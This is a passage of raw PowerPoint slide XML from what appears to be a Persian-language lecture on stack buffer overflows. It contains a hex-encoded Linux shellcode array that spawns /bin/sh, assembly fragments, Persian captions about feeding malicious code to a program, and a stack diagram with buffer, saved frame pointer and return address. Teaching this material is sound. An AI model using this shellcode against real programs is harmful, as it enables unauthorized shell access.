              <a:t>call	-0x24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>.string	“/bin/sh”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21510" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2286000"/>
            <a:ext cx="5128648" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char shellcode[] = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“\xff\xff/bin/sh”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="1447800"/>
            <a:ext cx="381000" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 147222"/>
              <a:gd name="adj2" fmla="val 25855"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21512" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="4191000"/>
            <a:ext cx="5029200" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بايد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نهايي ايجاد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کرد که </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>براي ماشين </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قابل اجرا باشد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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714375" y="0"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>کد مخرب را براي اجرا به برنامه بدهيد</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>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22533" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3124200"/>
            <a:ext cx="609600" cy="609600"/>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22534" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="3733800"/>
            <a:ext cx="504825" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3733800"/>
            <a:ext cx="557213" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3124200"/>
            <a:ext cx="4038600" cy="609600"/>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22537" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3733800"/>
            <a:ext cx="928688" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22538" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7423944" y="3091656"/>
            <a:ext cx="2128838" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22539" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-619125" y="3209925"/>
            <a:ext cx="2517775" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22540" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22541" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22542" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22543" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22544" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22545" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22546" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22547" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22548" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22549" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22550" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22551" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22552" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22553" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22554" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22555" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22556" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22557" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22558" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3276600"/>
            <a:ext cx="311150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>S</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
